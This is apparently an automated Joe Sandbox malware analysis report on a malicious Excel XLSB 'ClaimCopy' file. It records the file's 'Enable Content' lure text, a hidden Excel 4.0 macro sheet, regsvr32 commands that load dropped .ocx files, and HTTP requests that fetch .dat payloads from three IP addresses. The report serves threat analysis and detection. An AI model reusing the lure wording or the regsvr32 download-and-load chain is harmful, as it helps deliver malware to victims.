    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: EXCEL.EXE, 00000000.00000002.608505078.0000000012D5D000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/api/v1.0/me/ActivitiesMBI_SSL
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/3
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://pages.store.office.com/review/query
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/review/query%
    Source: EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: EXCEL.EXE, 00000000.00000003.413455560.000000000F457000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.607735341.000000000F457000.00000004.00000001.sdmpString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptionslL
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json98
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: global traffic HTTP traffic detected: GET /337591964609.dat HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 185.82.126.78 Connection: Keep-Alive
    Source: global traffic HTTP traffic detected: GET /337591964609.dat HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 158.69.133.78 Connection: Keep-Alive
    Source: global traffic HTTP traffic detected: GET /337591964609.dat HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 45.142.211.62 Connection: Keep-Alive
    Source: global traffic HTTP traffic detected: GET /337591964609.dat2 HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 45.142.211.62 Connection: Keep-Alive
    Source: global traffic HTTP traffic detected: GET /337591964609.dat2 HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 185.82.126.78 Connection: Keep-Alive
    Source: global traffic HTTP traffic detected: GET /337591964609.dat2 HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 158.69.133.78 Connection: Keep-Alive

    System Summary:

    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
    Source: Screenshot number: 12 Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 pRoTEcmwARNNG Thisfileorigin
    Source: Screenshot number: 12 Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
    Source: Screenshot number: 12 Screenshot OCR: Enable Macros ) Why I can not open this document? Sheet Ready O Type here to search i "I Ki
    Source: Screenshot number: 16 Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 ~EcmwARNNG Thisfileoriginate
    Source: Screenshot number: 16 Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
    Source: Screenshot number: 16 Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
    Found Excel 4.0 Macro with suspicious formulas
    Source: ClaimCopy-1848214335-12022021.xlsb Initial sample: EXEC
    Found protected and hidden Excel 4.0 Macro sheet
    Source: ClaimCopy-1848214335-12022021.xlsb Initial sample: Sheet name: Tiposa1
    Source: ClaimCopy-1848214335-12022021.xlsb Macro extractor: Sheet name: Tiposa1
    Source: ClaimCopy-1848214335-12022021.xlsb Macro extractor: Sheet name: Tiposa
    Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Code function: 0_3_12F380D0
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Code function: 0_3_12F3B140
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Code function: 0_3_12F380AC
    Source: ClaimCopy-1848214335-12022021.xlsb Virustotal: Detection: 8%
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
    Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet1.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet2.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet3.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet5.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet6.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{9BF09C99-1BEE-4B64-994B-EDA637E32634} - OProcSessId.dat
    Source: classification engine Classification label: mal76.expl.evad.winXLSB@13/6@0/3
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File read: C:\Users\desktop.ini
    Source: C:\Windows\SysWOW64\regsvr32.exe Automated click: OK
    Source: Window Recorder Window detected: More than 3 window changes detected
    Source: ClaimCopy-1848214335-12022021.xlsb Initial sample: OLE zip file path = xl/media/image1.jpg
    Source: ClaimCopy-1848214335-12022021.xlsb Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: D1330000.0.dr Initial sample: OLE zip file path = xl/media/image1.jpg
    Source: D1330000.0.dr Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX
    Source: EXCEL.EXE, 00000000.00000002.607513208.000000000F3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.607425649.000000000F330000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
    Source: EXCEL.EXE, 00000000.00000002.605060026.000000000D4E1000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
    Source: Yara match File source: app.xml, type: SAMPLE
    Source: EXCEL.EXE, 00000000.00000002.602431128.0000000002B30000.00000002.00020000.sdmp Binary or memory string: Program Manager
    Source: EXCEL.EXE, 00000000.00000002.602431128.0000000002B30000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
    Source: EXCEL.EXE, 00000000.00000002.602431128.0000000002B30000.00000002.00020000.sdmp Binary or memory string: Progman
    Source: EXCEL.EXE, 00000000.00000002.602431128.0000000002B30000.00000002.00020000.sdmp Binary or memory string: Progmanlock

    Mitre Att&ck Matrix

    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
    Valid Accounts | Scripting 2 | DLL Side-Loading 1 | Process Injection 2 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
    Default Accounts | Exploitation for Client Execution 22 | Boot or Logon Initialization Scripts | DLL Side-Loading 1 | Disable or Modify Tools 1 | LSASS Memory | Process Discovery 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
    Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 2 | Security Account Manager | File and Directory Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
    Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting 2 | NTDS | System Information Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 12 | SIM Card Swap | | Carrier Billing Fraud
    Cloud Accounts | Cron | Network Logon Script | Network Logon Script | DLL Side-Loading 1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    Source | Detection | Scanner | Label | Link
    ClaimCopy-1848214335-12022021.xlsb | 9% | Virustotal | | Browse

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs


    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    Name | Malicious | Antivirus Detection | Reputation
    http://158.69.133.78/337591964609.dat2 | false | Avira URL Cloud: safe | unknown
    http://158.69.133.78/337591964609.dat | false | Avira URL Cloud: safe | unknown
    http://185.82.126.78/337591964609.dat2 | false | Avira URL Cloud: safe | unknown
    http://185.82.126.78/337591964609.dat | false | Avira URL Cloud: safe | unknown

    URLs from Memory and Binaries

                                                                                                      high
                                                                                                      https://login.windows.net/common/oauth2/authorizeHEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
                                                                                                          high
                                                                                                          https://login.windows.net/common/oauth2/authorizeIEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            https://login.windows.net/common/oauth2/authorizeJEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              https://outlook.office.com/EXCEL.EXE, 00000000.00000002.607398237.000000000F300000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
                                                                                                                high
                                                                                                                https://login.windows.net/common/oauth2/authorizeKEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  https://storage.live.com/clientlogs/uploadlocationEXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
                                                                                                                    high
                                                                                                                    https://substrate.office.com/search/api/v1/SearchHistoryEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
                                                                                                                      high
                                                                                                                      https://login.windows.net/common/oauth2/authorizeEEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        https://login.windows.net/common/oauth2/authorizeFEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          https://login.windows.net/common/oauth2/authorizeGEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            https://login.windows.net/common/oauth2/authorize8EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile~9EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                https://login.windows.net/common/oauth2/authorize9EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://login.windows.net/common/oauth2/authorizeU.Q;/EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://login.windows.net/common/oauth2/authorize?-EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://login.windows.net/common/oauth2/authorize?EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://login.windows.net/common/oauth2/authorizeD..;.EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://devnull.onenote.comedEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          https://graph.windows.net/EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://login.windows.net/common/oauth2/authorizentEXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpfalse
                                                                                                                                              high

                                                                                                                                              Contacted IPs

                                                                                                                                              Public

IP | Domain | Country | ASN | ASN Name | Malicious
45.142.211.62 | unknown | Russian Federation | 208861 | RACKTECHRU | false
158.69.133.78 | unknown | Canada | 16276 | OVHFR | false
185.82.126.78 | unknown | Latvia | 52173 | MAKONIXLV | false

                                                                                                                                              General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 532757
Start date: 02.12.2021
Start time: 17:28:03
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 28s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: ClaimCopy-1848214335-12022021.xlsb
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of analysed new started processes analysed: 27
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal76.expl.evad.winXLSB@13/6@0/3
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
                                                                                                                                              Cookbook Comments:
                                                                                                                                              • Adjust boot time
                                                                                                                                              • Enable AMSI
                                                                                                                                              • Found application associated with file extension: .xlsb
                                                                                                                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                              • Attach to Office via COM
                                                                                                                                              • Scroll down
                                                                                                                                              • Close Viewer
                                                                                                                                              Warnings:
                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                              • Excluded IPs from analysis (whitelisted): 92.122.145.220, 52.109.88.177, 52.109.76.36, 80.67.82.235, 80.67.82.211
                                                                                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, config.officeapps.live.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                              • Execution Graph export aborted for target EXCEL.EXE, PID 5116 because there are no executed function
                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                                                                              Simulations

                                                                                                                                              Behavior and APIs

                                                                                                                                              No simulations

                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                              IPs

Match | Associated Sample Name / URL | Detection | Context
45.142.211.62 | ClaimCopy-539408676-12022021.xlsb | malicious | 45.142.211.62/480628690611.dat2
45.142.211.62 | ClaimCopy-539408676-12022021.xlsb | malicious | 45.142.211.62/939602286691.dat2
45.142.211.62 | ClaimCopy-539408676-12022021.xlsb | malicious | 45.142.211.62/533792932717.dat2
158.69.133.78 | ClaimCopy-1848214335-12022021.xlsb | malicious | 158.69.133.78/710203175032.dat2
158.69.133.78 | ClaimCopy-539408676-12022021.xlsb | malicious | 158.69.133.78/480628690611.dat2
158.69.133.78 | ClaimCopy-539408676-12022021.xlsb | malicious | 158.69.133.78/939602286691.dat2
158.69.133.78 | ClaimCopy-539408676-12022021.xlsb | malicious | 158.69.133.78/533792932717.dat2

                                                                                                                                              Domains

                                                                                                                                              No context

                                                                                                                                              ASN

Match | Associated Sample Name / URL | Detection | Context
RACKTECHRU | ClaimCopy-1848214335-12022021.xlsb | malicious | 45.142.211.62
RACKTECHRU | ClaimCopy-539408676-12022021.xlsb | malicious | 45.142.211.62
RACKTECHRU | ClaimCopy-539408676-12022021.xlsb | malicious | 45.142.211.62
RACKTECHRU | ClaimCopy-539408676-12022021.xlsb | malicious | 45.142.211.62
RACKTECHRU | CNSL-1741057625-Nov-22.xlsb | malicious | 45.142.211.22
RACKTECHRU | CNSL-1741057625-Nov-22.xlsb | malicious | 45.142.211.22
RACKTECHRU | 8Jem3WHfr1.exe | malicious | 193.38.235.234
RACKTECHRU | Static.exe | malicious | 193.38.235.15
                                                                                                                                              aFxrnP3GU4Get hashmaliciousBrowse
                                                                                                                                              • 91.223.144.104
                                                                                                                                              mirai.armGet hashmaliciousBrowse
                                                                                                                                              • 95.181.163.105
                                                                                                                                              W1Mjz5NWWlGet hashmaliciousBrowse
                                                                                                                                              • 91.223.144.109
                                                                                                                                              qQKiWkenaq.exeGet hashmaliciousBrowse
                                                                                                                                              • 185.156.177.75
                                                                                                                                              VKtCIrdZz3.exeGet hashmaliciousBrowse
                                                                                                                                              • 185.156.177.75
                                                                                                                                              9lzoAGDhiF.exeGet hashmaliciousBrowse
                                                                                                                                              • 185.156.177.75
                                                                                                                                              jgkOeJEe1J.exeGet hashmaliciousBrowse
                                                                                                                                              • 185.156.177.75
                                                                                                                                              2xwePIrz6Y.exeGet hashmaliciousBrowse
                                                                                                                                              • 185.156.177.75
                                                                                                                                              I6l48v5NQDGet hashmaliciousBrowse
                                                                                                                                              • 193.38.234.19
                                                                                                                                              Nzt41q6zTL.exeGet hashmaliciousBrowse
                                                                                                                                              • 95.181.163.15
                                                                                                                                              setup_x86_x64_install.exeGet hashmaliciousBrowse
                                                                                                                                              • 95.181.163.181
